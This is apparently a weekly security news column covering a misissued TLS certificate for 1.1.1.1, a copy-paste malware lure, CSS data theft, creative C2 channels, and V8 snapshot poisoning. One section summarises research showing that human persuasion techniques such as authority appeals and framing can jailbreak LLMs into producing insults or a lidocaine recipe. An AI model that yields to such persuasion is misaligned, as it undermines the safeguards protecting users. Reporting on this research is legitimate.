Something rather significant happened on the Internet back in May, and it seems that someone only noticed it on September 3rd. [Youfu Zhang] dropped a note on one of the Mozilla security mailing lists, pointing out that there was a certificate issued by Fina for 1.1.1.1. That IP address may sound familiar, and you may have questions.
First off, yes, TLS certificates can be issued for IP addresses. You can even get a numeric TLS certificate for your IP address, via Lets Encrypt. And second, 1.1.1.1 sounds familiar because that’s CloudFlare’s public DNS resolver. On that address, Cloudflare notably makes use of DoH, a charming abbreviation for DNS over HTTPS. The last important detail is that Cloudflare didn’t request or authorize the certificate. Significant indeed.
This is a high-profile example of the major weakness of the TLS certificate system. There are over 300 trusted certificate authorities in the Microsoft Root Certificate Program, Financijska agencija (Fina) being one of them. All it takes is for one of those trusted roots to issue a bad certificate, to compromise that system. That it took four months for someone to discover and point out the problem isn’t great.
Don’t Just Copy That Into Your Terminal
I’ve given Linux newbies the advice several times, not to be careless about copying and pasting commands into the Linux terminal. Sometimes that’s because practical jokers suggest running rm -rf /, or a fork bomb, or some other “fun” command to fix a problem. But there’s also the problem of malware, and it’s not limited to Linux. For example, this reasonably convincing looking notification from Cloudflare instructs the user to copy and past a completely benign-looking string into a terminal on a Mac machine.
… say what now
It’s pretty obviously not a real command as it’s presented. Instead, a base64 encoded string is decoded and executed in Bash. It executes a script from the Internet, which immediately begins looking for interesting files to upload. It’s not a terribly new approach, but is apparently still being used in the wild, and is a great object lesson about not trusting commands from the Internet.
CSS is Turing Complete Now, So Let’s Use it to Steal Data
OK, Turing complete might be a slight exaggeration, but CSS does now have if() statements. CSS also can do background downloads from remote sites. Put that together, and you have a way to steal data.
There are some serious limitations that are likely to keep this from becoming a widely used technique. Top of the list is that CSS doesn’t have any string carving functions. That if() statement is limited to matching the complete value of fields. To steal information strictly using CSS, you have to know what you’re looking for ahead of time.
Creative C2
It’s always interesting to see the creative Command and Control (C2) techniques that are dreamt up by researchers and threat actors. MeetC2 is up first, a demonstration of using Google Calendar for C2 via calendar events. It works because no security solution will block access to Google Calendar, and it’s fairly trivial to add notes to a calendar event.
The other creative C2 involves a project I’m intimately familiar with. MeshC2 is a clever, but admittedly vibe-coded C2 tool using Meshtastic to run commands on remote hosts. It’s from [Eric Escobar], one of the researchers at Sophos. When dropping a Raspberry Pi off for a penetration test, there’s an inevitable problem that knocks the platform off the Internet, and the ability to run a few simple commands could make all the difference.
Persuasion and LLMs
Persuasion is the art of influencing. When a car salesman buys a potential customer a drink from the car lot’s vending machine, it’s an attempt to persuade. When a negotiators picks up on and imitates the small habits of their counterparts, it’s also an attempt to leverage persuasion. From appeals to authority, to priming, to framing, there are countless tricks that are tried, with varying amounts of success, to influence people. The question here is whether those tricks might work on an LLM.
A pre-print study seems to indicate that persuasion does indeed work on AIs. And while persuasion may convince a human to buy a car beyond one’s means, persuasion can be used to convince an AI to do something beyond its guardrails. The two test cases were to ask the LLM to return an insult, and to return the recipe for lidocaine. While this isn’t the only way to jailbreak an LLM, it’s a novel bit of work, determining that the AI has some of the same weaknesses as humans.
The Scam Become Real
If you run your own mail server, or check your spam folder, you’ve surely seen the emails where a scammer claims to have taken over your webcam while you were watching pornography. Historically this has been a complete lie, simply to extort the naive. Unfortunately, it seems that someone took this as a challenge, and has actually built malware that attempts to do exactly what the classic spam has threatened. And of course, it’s open source.
Bits and Bytes
Researchers at Silent Signal took a look at the IBM i mainframe system, and have a CVE to show for it. The exploit was a replay attack followed by a command injection. The first approach allowed for blind code execution, but the challenge on this second time around was to find something more useful, and SQL turned out to be the key.
And finally, the folks at Trail of Bits are looking at the application integrity problem, when running applications inside electron and even Chrome. The binaries themselves may be signed, but there’s a part of the program that isn’t: The heap snapshots. This is a V8 feature used to significantly speed up the loading of the pages inside these apps. It turns out that snapshot can also be used to poison the internal state of those apps, and sidestep existing controls. Electron has patched the issue, but there are some cases where Chrome itself may still be vulnerable to this fascinating approach.
Source link
